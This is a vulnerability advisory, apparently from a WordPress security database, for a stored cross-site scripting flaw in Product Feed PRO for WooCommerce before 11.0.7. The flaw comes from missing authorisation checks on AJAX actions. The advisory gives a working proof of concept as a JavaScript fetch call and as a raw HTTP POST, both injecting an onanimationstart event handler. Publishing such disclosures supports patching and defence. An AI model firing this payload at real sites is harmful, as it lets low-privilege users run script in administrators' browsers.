Product Feed PRO for WooCommerce < 11.0.7 - Subscriber+ Settings Update to Stored XSS

2021-12-2300:00:00

Krzysztof Zając

0.001 Low

EPSS

Percentile

25.0%

JSON

The plugin does not have authorisation and CSRF check in some of its AJAX actions, allowing any authenticated users to call then, which could lead to Stored Cross-Site Scripting issue (which will be triggered in the admin dashboard) due to the lack of escaping. v10.9.1 added a CSRF check, however authorisation was still missing until 11.0.7

fetch("https://example.com/wp-admin/admin-ajax.php", {
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
    },
    "body": "action=woosea_add_attributes&attribute_name=x&attribute_value=\'\" style=animation-name:blinker onanimationstart=alert(1) x=&active=true",
    "method": "POST"
});

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 138
Connection: close
Cookie: [any authenticated user]

action=woosea_add_attributes&attribute_name=x&attribute_value='"+style=animation-name:blinker+onanimationstart=alert(/XSS/)+x=&active=true

The XSS will be triggered when creating a feed (at the second step/page)

0.001 Low

EPSS

Percentile

25.0%

JSON

Related for WPEX-ID:8ED549FE-7D27-4A7A-B226-C20252964B29